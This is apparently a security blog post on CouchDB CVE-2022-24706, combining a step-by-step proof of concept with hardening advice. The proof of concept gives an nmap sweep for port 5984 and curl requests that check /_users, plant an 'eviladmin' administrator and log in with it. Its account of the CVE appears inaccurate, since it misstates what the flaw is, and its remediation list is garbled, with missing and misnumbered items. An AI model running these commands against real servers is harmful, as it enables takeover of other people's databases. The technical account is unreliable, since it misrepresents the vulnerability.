CVE-2022-24706 - How a Misconfigured Apache CouchDB Allows Attackers to Gain Admin Access

Apache CouchDB is a popular NoSQL database that’s easy to set up and use. But if you’re using a version before 3.2.2 and didn’t lock it down, you could be open to a huge security risk.

In this post, we’ll break down the details of CVE-2022-24706, show how attackers exploit it, and provide simple steps to secure your CouchDB. If you run any CouchDB instance (especially on the cloud or exposed to the internet), keep reading.

Impact: Remote attackers can gain full admin privileges

CVE-2022-24706 Reference

How the Exploit Works

When you install CouchDB and don’t change any settings, it listens on all network interfaces (...) by default. Before version 3.2.2, if some extra security options weren’t set, it failed to ask for authentication—meaning any remote user could connect as an admin.

This isn’t a bug, but a dangerously insecure default setup. CouchDB documentation has always recommended:

Putting a firewall in front of the database

But, for users who missed these steps, their databases could be wide open.

Proof of Concept: Exploiting the Default CouchDB

Below, we'll show how an attacker could connect to an unprotected CouchDB and create a new admin account.

Step 1: Scan for Database

An attacker finds open CouchDB instances by scanning for port 5984 on the internet (the default CouchDB port). Tools like nmap and Shodan can help:

nmap -p 5984 --open -Pn <target_ip_range>

Step 2: Access the CouchDB HTTP Interface

CouchDB is accessible via simple HTTP requests. Let’s use curl to check if authentication is enforced:

curl http://target-ip:5984/_users

If the output shows data or {"db_name":"_users",...}, that means no authentication is set.

If the database isn’t secured, the attacker can create a new admin using HTTP requests

curl -X PUT http://target-ip:5984/_node/_local/_config/admins/eviladmin \
     -d '"SuperSecretPassword"'

This adds a new admin called eviladmin with your chosen password.

Now you can login as admin

curl --user eviladmin:SuperSecretPassword http://target-ip:5984/_all_dbs

You have full control: create databases, delete data, dump contents, or even run arbitrary code if CouchDB’s features allow.

Upgrade Immediately: Update to CouchDB 3.2.2 or newer.

2. Set Up Admin Credentials: On install, create a strong admin user/password.

Remove Unused Users: Delete old users and disable guest access.

> CouchDB’s official security documentation has more details.

Original References & Further Reading

- CVE Entry: CVE-2022-24706
- Apache CouchDB Advisory: https://github.com/apache/couchdb/security/advisories/GHSA-4jqg-xc45-759r
- CouchDB Security Guide: https://docs.couchdb.org/en/stable/secure.html

Summary

CVE-2022-24706 is a textbook case of “bad defaults” in software leading to big trouble. If you run an old CouchDB or never set an admin password, you’re at risk.

Act now: Upgrade, lock down your database, and add a firewall. If you wait, someone else might find your data first.

Stay safe!

*Written exclusively for you. Share and secure your database today!*

Timeline

Published on: 04/26/2022 10:15:00 UTC
Last modified on: 07/13/2022 18:15:00 UTC